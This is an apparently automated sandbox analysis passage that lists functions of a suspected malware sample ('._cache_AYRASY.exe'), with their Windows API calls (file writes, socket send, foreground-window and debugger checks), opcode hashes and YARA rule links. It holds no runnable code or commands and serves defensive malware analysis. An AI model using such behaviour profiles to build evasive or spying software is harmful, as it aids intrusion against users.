                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001B6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,001B685E,?,?,?,001E4A5C,0020E448,00000003,?,?), ref: 001B66E2
                                                                                                                              • WriteFile.KERNEL32(?,?,"#,00000000,00000000,?,?,?,001E4A5C,0020E448,00000003,?,?,00174C44,?,?), ref: 001B686C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$PointerWrite
                                                                                                                              • String ID: "#
                                                                                                                              • API String ID: 539440098-3789857742
                                                                                                                              • Opcode ID: ecfecdbbad9a43d5f70a322b5c249ef2fe61898b08de4cdd8c30d46bd7344061
                                                                                                                              • Instruction ID: cb4be0fb21c7a84c547130003f87d4b078319f307029c55eeefeebe6faaab9ee
                                                                                                                              • Opcode Fuzzy Hash: ecfecdbbad9a43d5f70a322b5c249ef2fe61898b08de4cdd8c30d46bd7344061
                                                                                                                              • Instruction Fuzzy Hash: A7E04D36000208BBDB20AF94E801ADABBB9EB08320F00051AF941A2010D7B6AA14EBA0
                                                                                                                              Function 0018F461 Relevance: 3.2, APIs: 2, Instructions: 159COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c34c209c65dfa9cc708d17ee9da13298de34f6b0e9f2b445f95f566da3ba9e28
                                                                                                                              • Instruction ID: 2afcd10082f1973c07eed9d1b55c18b5ee07d97129e0166ecb89fe0237774e5e
                                                                                                                              • Opcode Fuzzy Hash: c34c209c65dfa9cc708d17ee9da13298de34f6b0e9f2b445f95f566da3ba9e28
                                                                                                                              • Instruction Fuzzy Hash: 7051D4312047019FCB14EF68C491BAE73E5AFA8324F54856DF99A8B292DB30ED45CF91
                                                                                                                              Function 001BAE06 Relevance: 3.1, APIs: 2, Instructions: 120COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4104443479-0
                                                                                                                              • Opcode ID: e5aa09aba4268c1cc50c761c193fdb18672b9a9d58f429ba963382a05431ee3a
                                                                                                                              • Instruction ID: 26dab7e9a5991d40774d8d9579c10c18e598249687bbaa438ebffb39bf15a142
                                                                                                                              • Opcode Fuzzy Hash: e5aa09aba4268c1cc50c761c193fdb18672b9a9d58f429ba963382a05431ee3a
                                                                                                                              • Instruction Fuzzy Hash: 513190B16002049FDB14EFA8D8819FEB7F8EF69310F64886DE18597282DB71D9058B61
                                                                                                                              Function 001C8065 Relevance: 3.1, APIs: 2, Instructions: 98COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetCursorPos.USER32(?), ref: 001C8074
                                                                                                                              • GetForegroundWindow.USER32 ref: 001C807A
                                                                                                                                • Part of subcall function 001C6B19: GetWindowRect.USER32(?,?), ref: 001C6B2C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$CursorForegroundRect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1066937146-0
                                                                                                                              • Opcode ID: 2ffdb87695d2f9d67f73b6185900e0c22e50346b029b05596663ab30d220e7ef
                                                                                                                              • Instruction ID: 2c342f6f5a9c3e5e2329254a327c9d44e949a9b6d2641dfed8e6368b225dfc24
                                                                                                                              • Opcode Fuzzy Hash: 2ffdb87695d2f9d67f73b6185900e0c22e50346b029b05596663ab30d220e7ef
                                                                                                                              • Instruction Fuzzy Hash: 59312C75A00218AFDB11EFA4DC81BEEB7F8FF28314F14442AE945A7251DB34AE45CB90
                                                                                                                              Function 00171DCE Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • IsWindow.USER32(00000000), ref: 001EDB31
                                                                                                                              • IsWindow.USER32(00000000), ref: 001EDB6B
                                                                                                                                • Part of subcall function 00171F04: GetForegroundWindow.USER32 ref: 00171FBE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Foreground
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 62970417-0
                                                                                                                              • Opcode ID: 22ebb9801ac950fb7315f4923afc672320b08d0d854af1e4df14fdbac8c871ff
                                                                                                                              • Instruction ID: 1f1acbed49cd4be4c20ec396147676a7013f50c4f50ddbfbbc3a6d4a56e4c826
                                                                                                                              • Opcode Fuzzy Hash: 22ebb9801ac950fb7315f4923afc672320b08d0d854af1e4df14fdbac8c871ff
                                                                                                                              • Instruction Fuzzy Hash: FC21CD72200206AADB21AB75D881BFE77BA9F91784F118429F95ED6141EF70EE02D760
                                                                                                                              Function 001AE2E8 Relevance: 3.1, APIs: 2, Instructions: 69windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0017193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00171952
                                                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 001AE344
                                                                                                                              • _strlen.LIBCMT ref: 001AE34F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Timeout_strlen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2777139624-0
                                                                                                                              • Opcode ID: 83a10175b1d81292539e42862e6cdb0e9ba3095a42187cbafa282f0e1e5f7ca3
                                                                                                                              • Instruction ID: 8b491a08a9e4c9600eac9522462ea43c946400a6134907a53945966a3f62322c
                                                                                                                              • Opcode Fuzzy Hash: 83a10175b1d81292539e42862e6cdb0e9ba3095a42187cbafa282f0e1e5f7ca3
                                                                                                                              • Instruction Fuzzy Hash: 6511A3352002046BDF05BB68DC96DBE7BF9AF6A350B10443DF60ADB192DF60994687A0
                                                                                                                              Function 00173682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • 74A3C8D0.UXTHEME ref: 001736E6
                                                                                                                                • Part of subcall function 00192025: __lock.LIBCMT ref: 0019202B
                                                                                                                                • Part of subcall function 001732DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 001732F6
                                                                                                                                • Part of subcall function 001732DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0017330B
                                                                                                                                • Part of subcall function 0017374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0017376D
                                                                                                                                • Part of subcall function 0017374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0017377F
                                                                                                                                • Part of subcall function 0017374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_AYRASY.exe,00000104,?,00231120,C:\Users\user\Desktop\._cache_AYRASY.exe,00231124,?,?), ref: 001737EE
                                                                                                                                • Part of subcall function 0017374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00173860
                                                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00173726
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3809921791-0
                                                                                                                              • Opcode ID: 360de32a75a139939e2a79d421a0e55d461e9a0cd9e907eba9c2dba0bedd3046
                                                                                                                              • Instruction ID: 6583dc702dc1ada216f666aa9426bbcde0c285a7d822975c8606b9d285083fb4
                                                                                                                              • Opcode Fuzzy Hash: 360de32a75a139939e2a79d421a0e55d461e9a0cd9e907eba9c2dba0bedd3046
                                                                                                                              • Instruction Fuzzy Hash: 18118CB19083419FC304EF29E84995ABBF8FB94710F00861EF854872A1EB709A94CF92
                                                                                                                              Function 00174B88 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00174C2B,?,?,?,?,0017BE63), ref: 00174BB6
                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00174C2B,?,?,?,?,0017BE63), ref: 001E4972
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 823142352-0
                                                                                                                              • Opcode ID: 548925893232901b1dad41329b79d4f268afa325ea5c307644ceac78b7d5e14a
                                                                                                                              • Instruction ID: 7532d63229b7412d23876e2c60ee878f861eb6f03dc1758fed3f12ff8f651658
                                                                                                                              • Opcode Fuzzy Hash: 548925893232901b1dad41329b79d4f268afa325ea5c307644ceac78b7d5e14a
                                                                                                                              • Instruction Fuzzy Hash: 31016D70248208BFF2344E248C8AF663AACAB09768F108319BAE86A1E0C7B45C44CB54
                                                                                                                              Function 0018F26B Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,001BAEA5,?,?,00000000,00000008), ref: 0018F282
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,001BAEA5,?,?,00000000,00000008), ref: 0018F2A6
                                                                                                                                • Part of subcall function 0018F2D0: _memmove.LIBCMT ref: 0018F307
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide$_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3033907384-0
                                                                                                                              • Opcode ID: 4df1ae2b23ed143af2397991aeaddec5204607115e516e59b7a747198175a9cc
                                                                                                                              • Instruction ID: 3f8f64918b38c260f8a46d8b43e7099ae20108eb5c6e2e7b0cd42b768875ba5a
                                                                                                                              • Opcode Fuzzy Hash: 4df1ae2b23ed143af2397991aeaddec5204607115e516e59b7a747198175a9cc
                                                                                                                              • Instruction Fuzzy Hash: 01F03CB6104114BFAB11ABA5AC44DBB7BAEEF9A360700802AFD09CA111DA31DD41CB71
                                                                                                                              Function 0019F782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ___lock_fhandle.LIBCMT ref: 0019F7D9
                                                                                                                              • __close_nolock.LIBCMT ref: 0019F7F2
                                                                                                                                • Part of subcall function 0019886A: __getptd_noexit.LIBCMT ref: 0019886A
                                                                                                                                • Part of subcall function 0019889E: __getptd_noexit.LIBCMT ref: 0019889E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1046115767-0
                                                                                                                              • Opcode ID: e9b7f2fbe72a3710854e6352571dd35bf952c932fec308f89d6575f25590918b
                                                                                                                              • Instruction ID: f0a0b18ecc31fca1733f0d2bd85a608417fd8c4b88714d05a151b389acd51cc7
                                                                                                                              • Opcode Fuzzy Hash: e9b7f2fbe72a3710854e6352571dd35bf952c932fec308f89d6575f25590918b
                                                                                                                              • Instruction Fuzzy Hash: 0A110832C15610AEDF557FA4E88639876505F52731F660368E4349F1E3CBB4990287B1
                                                                                                                              Function 001734F3 Relevance: 3.0, APIs: 2, Instructions: 49COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0017352A
                                                                                                                                • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
                                                                                                                              • _wcscat.LIBCMT ref: 001E66C0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FullNamePath_memmove_wcscat
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 257928180-0
                                                                                                                              • Opcode ID: e7e33c4e26a7f143c5e37cf357e9e5a825e2a189b43611a85d6ea8bb086fc089
                                                                                                                              • Instruction ID: 5c7e57e99b3a757f9d1a3596bc2ea46d35eaf0e6dffcab60943b9a021e979342
                                                                                                                              • Opcode Fuzzy Hash: e7e33c4e26a7f143c5e37cf357e9e5a825e2a189b43611a85d6ea8bb086fc089
                                                                                                                              • Instruction Fuzzy Hash: 7301927195410DAACF04FBA0DC45ADD73F9EF24348F10C1A5AA2ED3190EF709B959BA1
                                                                                                                              Function 001C9500 Relevance: 3.0, APIs: 2, Instructions: 46networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • send.WS2_32(00000000,?,00000000,00000000), ref: 001C9534
                                                                                                                              • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 001C9557
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLastsend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1802528911-0
                                                                                                                              • Opcode ID: 2a9abaec04e3745da4fe93286c92aa064fc1c39d65d6e96ba4a9fe94c07d2125
                                                                                                                              • Instruction ID: 774c3c6acb065ab13e13e1a84141071d3c496f6f6b251d8a43460aaa5818954b
                                                                                                                              • Opcode Fuzzy Hash: 2a9abaec04e3745da4fe93286c92aa064fc1c39d65d6e96ba4a9fe94c07d2125
                                                                                                                              • Instruction Fuzzy Hash: 9E0184353002009FC714EF24D895F6AB7E9EFA8724F10811EE64A87791CB70EC01CB90
                                                                                                                              Function 00194274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0019889E: __getptd_noexit.LIBCMT ref: 0019889E
                                                                                                                              • __lock_file.LIBCMT ref: 001942B9
                                                                                                                                • Part of subcall function 00195A9F: __lock.LIBCMT ref: 00195AC2
                                                                                                                              • __fclose_nolock.LIBCMT ref: 001942C4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2800547568-0
                                                                                                                              • Opcode ID: 5e456021488a393c0227776ee525e2062eb3f4aa303ce8fdd2274eb847904e4a
                                                                                                                              • Instruction ID: 89a59339dd767a18776f9af486bbb1f17c85e6ed6ee98dc111f610072458da81
                                                                                                                              • Opcode Fuzzy Hash: 5e456021488a393c0227776ee525e2062eb3f4aa303ce8fdd2274eb847904e4a
                                                                                                                              • Instruction Fuzzy Hash: B1F0E9318117149BDF25BBB5A806F5E77E17F51334F258209F824AB1C1CB7C99029F55
                                                                                                                              Function 0018F55E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • timeGetTime.WINMM ref: 0018F57A
                                                                                                                                • Part of subcall function 0017E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0017E279
                                                                                                                              • Sleep.KERNEL32(00000000), ref: 001E75D3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
